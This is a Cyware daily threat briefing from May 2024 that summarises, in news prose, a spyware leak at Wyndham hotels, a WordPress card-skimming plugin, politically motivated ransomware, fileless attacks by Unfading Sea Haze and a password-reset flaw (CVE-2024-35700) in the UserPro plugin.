Cyware Daily Threat Intelligence

Daily Threat Briefing • May 23, 2024
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • May 23, 2024
Fake WordPress plugins wreak havoc! Cybercriminals were spotted abusing a WordPress plugin to inject obfuscated PHP malware, stealing credit card details from a WooCommerce store. Meanwhile, another WordPress plugin, UserPro, was discovered containing a critical security vulnerability that allowed threat actors to reset user passwords. Over 20,000 sites were impacted; users should update to version 5.1.9 immediately.
In other headlines, a spyware app called pcTattletale was found stealing hotel guest data and inadvertently exposing it owing to a security hole. Intended for remote monitoring, the app had infected check-in systems at three U.S. Wyndham hotels.
Commodity spyware exposed sensitive guest data
A consumer-grade spyware app, pcTattletale, has been discovered on check-in systems at three Wyndham hotels in the U.S., exposing sensitive data. The spyware, intended for remote monitoring, captured screenshots containing sensitive information like guest names and partial payment card numbers. It was found exposing these screenshots publicly due to a security flaw.
Malicious plugin used to skim credit card
Attackers exploited the obscure Dessky Snippets WordPress plugin to inject server-side malware into a WooCommerce store, stealing credit card details. The malware, disguised within PHP code, manipulates billing forms to capture sensitive information. It then sends the captured data to a third-party URL, bypassing browser autocomplete warnings to avoid suspicion.
Ransomware exploited for political agendas
Sentinel One researchers revealed a shift in tactics among cybercriminal groups increasingly deploying ransomware to disrupt and draw attention to political causes, targeting Philippine entities. Groups such as Ikaruz Red Team (IRT), Turk Hack Team, and Anka Underground leverage leaked builders, hijack branding from government agencies like CERT-PH, intertwining cyberattacks with geopolitical tensions.
Filess infection method by Unfading Sea Haze
Bitdefender uncovered a covert operation by the elusive Unfading Sea Haze threat actor who leveraged fileless malware via MSBuild exploitation. Their arsenal, spanning from keyloggers to Gh0stRAT variants, demonstrates sophistication and adaptability. They employ commercial RMM tools and custom exfiltration methods to evade traditional defenses.
Critical bug found in UserPro plugin
The UserPro plugin by DeluxeThemes, used by over 20,000 WordPress sites for creating user profiles and community portals, was found to have a critical security vulnerability. Discovered by Patchstack, the flaw resides in the password reset mechanism within the userpro_process_form function, allowing unauthenticated users to change others' passwords under certain conditions. Identified as CVE-2024-35700, the issue stemmed from improper handling of the “secret key” during password resets, enabling unauthorized access.